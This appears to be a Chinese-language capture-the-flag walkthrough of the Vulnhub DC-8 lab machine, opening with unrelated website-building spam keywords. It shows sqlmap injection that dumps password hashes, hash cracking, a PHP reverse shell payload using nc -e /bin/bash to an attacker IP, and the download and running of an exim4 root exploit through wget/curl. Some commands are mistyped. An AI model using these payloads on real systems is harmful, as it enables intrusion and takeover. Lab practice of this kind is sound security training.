大型网站制作小程序,2020网络公司排名,wordpress 计算程序,柳州网站建设找哪家好目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、SQL注入 sqlmap工具 2、dirsearch目录探测 3、反弹shell 4、提权 exim4 5、获取flag 四、总结 一、环境搭建 Vulnhub靶机下载#xff1a; 官网地址#xff1a;https://download.vulnhub.com/dc/DC-… 目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、SQL注入 sqlmap工具 2、dirsearch目录探测 3、反弹shell 4、提权 exim4 5、获取flag 四、总结 一、环境搭建 Vulnhub靶机下载 官网地址https://download.vulnhub.com/dc/DC-8.zip 虚拟机VM虚拟机 或者VBOX 导入即可 网络环境NAT 介绍vulnhub是个提供各种漏洞平台的综合靶场拿到root权限才可以发现最终的flag。 二、信息收集 1、主机发现 nmap -sP 192.168.176.0/24 查看服务 nmap -A -p- -v 192.168.176.143 进入网站192.168.176.143 2、指纹识别 whatweb http://192.168.176.143/ 三、漏洞复现 1、SQL注入 sqlmap工具 查看网站功能点发现一处sql交互 存在sql注入漏洞 使用‘等字符可以判断 sqlmap -u http://192.168.176.143/?nid1 -dbs 1.sqlmap -u http://192.168.176.143/?nid1 -D d7db -tables --batch
2.sqlmap -u http://192.168.176.143/?nid1 -D d7db -T users -colunms
3.sqlmap -u http://192.168.176.143/?nid1 -D d7db -T users -C name,pass -dump admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
获取到admin和john密码加密后的密文 然后新建一个pass.txt 把密文放进去使用john 进行破解 密码turtle 2、dirsearch目录探测 dirsearch -u http://192.168.176.143/ -e php -x 400,404,503,403 常用参数如下
-h 查看帮助
-u xx 目标域名xx
-e php 扫描网站的类型为php 类型如php,aspjsp
-t 40 线程为40默认为30
-x 400, 404, 503 排除响应码400...即响应码为这个的不输出到屏幕上
--full-url 输出完成的url模式这样直接点击就能访问扫描出的结果 http://192.168.176.143/user/login/ 后台地址 登录上面获取到的账号密码 3、反弹shell 发现Content-点击edit-点击WEBFORMS-点击Form settings-点击下拉框选择PHP code 输入反弹shell payload ?php system (nc -e /bin/bash 192.168.176.134 7777);? 代码写入保存后kali监听7777端口在Contact Us页面随便输入信息点击Submit后查看kali已得到shell 使用交互式shell python -c import pty; pty.spawn(/bin/bash) 4、提权 exim4 接下来提权 使用find命令查找具有suid权限的命令 find / -perm -us -type f 2/dev/null 找到一个exim4 查看一下版本信息 /usr/sbin/exim4 --version 使用searchsploit命令搜索exim相关漏洞 46996.sh拷贝到本地并改名为exp.sh上传到靶机 执行 kali开启http服务 service apache2 start 将脚本格式设置成符合unix格式 不然会提权失败 cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh vim exp.sh set ffunix cp exp.sh /var/www/html 靶机进入tmp目录wgent\curl下载脚本执行其他目录 没有权限 weget http://192.168.176.134/exp.sh 命令失败 curl 192.168.176.134/exp.sh -o exp6.sh 读取并重新保存为exp6.sh chmod 777 / X 给执行权限 执行文件 ./exp6.sh -m netcat 5、获取flag 四、总结 sqlmap进行SQL注入常用安全工具的熟悉exim4命令提权